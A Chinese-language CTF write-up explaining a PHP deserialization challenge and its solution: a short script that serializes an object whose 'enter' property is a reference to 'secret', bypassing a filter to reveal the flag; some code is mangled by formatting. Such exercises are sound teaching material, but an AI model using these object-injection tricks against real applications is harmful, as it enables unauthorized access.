PHP“引用”漏洞

今日例题:

<?php

highlight_file(FILE);

error_reporting(0);

include("flag.php");

class just4fun {

var $enter;

var $secret;

}

if (isset($_GET['pass'])) {

pass = _GET['pass'];

pass=str_replace('\*','\\\*',pass);

}

o = unserialize(pass);

if ($o) {

$o->secret = "*";

if (o-\>secret === o->enter)

echo "Congratulation! Here is my secret: ".$flag;

else

echo "Oh no... You can't fool me";

}

else echo "are you trolling?";

?>

这道题目其实很容易,其实就构造序列化字符串使enter=secret,但是secret已经写死了,变成*,我貌似只能给enter赋值*才能满足条件,但是 pass=str_replace('\*','\\\*',pass);这里我只要写入*就会被替换成\,所以现在问题变成了怎么在不写入*的情况下让enter=secret,这时就要使用引用漏洞。

引用漏洞:相当于创建了一个快捷方式,可以让你去访问,但是我又不是直接去对原对象赋值。

&$a->secret这里就是一个引用,在前面加个&符号就好

据陈腾师傅所说,所以这道题目的关键根本不在于他们是否都是*,而是在于他们相等,只要加个&就好了

代码如下:

复制代码
<?php


class just4fun{
    var $enter='*';
    var $secret;
}
$a= new just4fun();
$a->enter=&$a->secret;
echo serialize($a);

​

希望本文能够帮助大家。

相关推荐
聚铭网络1 小时前
聚铭网络参编!T/CCIA 005-2026《网络安全运营大模型参考架构》正式发布
网络·web安全·架构
天远云服1 小时前
驾培系统车辆核验实战:PHP集成天远二手车估值API实现学员车辆信息自动化管理
大数据·开发语言·自动化·php
ZHOUPUYU1 小时前
PHP异步编程实战ReactPHP到Swoole的现代方案
开发语言·php
暮色千里.5321 小时前
多因素认证中的漏洞
网络·安全·web安全
小二·1 小时前
企业级网络安全深度解析:从协议层到云原生的攻防实战与架构设计
安全·web安全·云原生
wanhengidc1 小时前
企业如何有效利用高防服务器
运维·服务器·网络·安全·web安全·智能手机
lay_liu2 小时前
QoS质量配置
开发语言·智能路由器·php
Maguyusi2 小时前
Debian13(trixie) 安装php8.5 php-fpm8.5
开发语言·php·lsky pro
乐6822 小时前
CISCN2026半决赛wp
python·web安全·php
AC赳赳老秦2 小时前
OpenClaw 系统监控实战指南:构建高效的电脑/服务器状态监控与自动告警系统
服务器·开发语言·人工智能·php·ai-native·deepseek·openclaw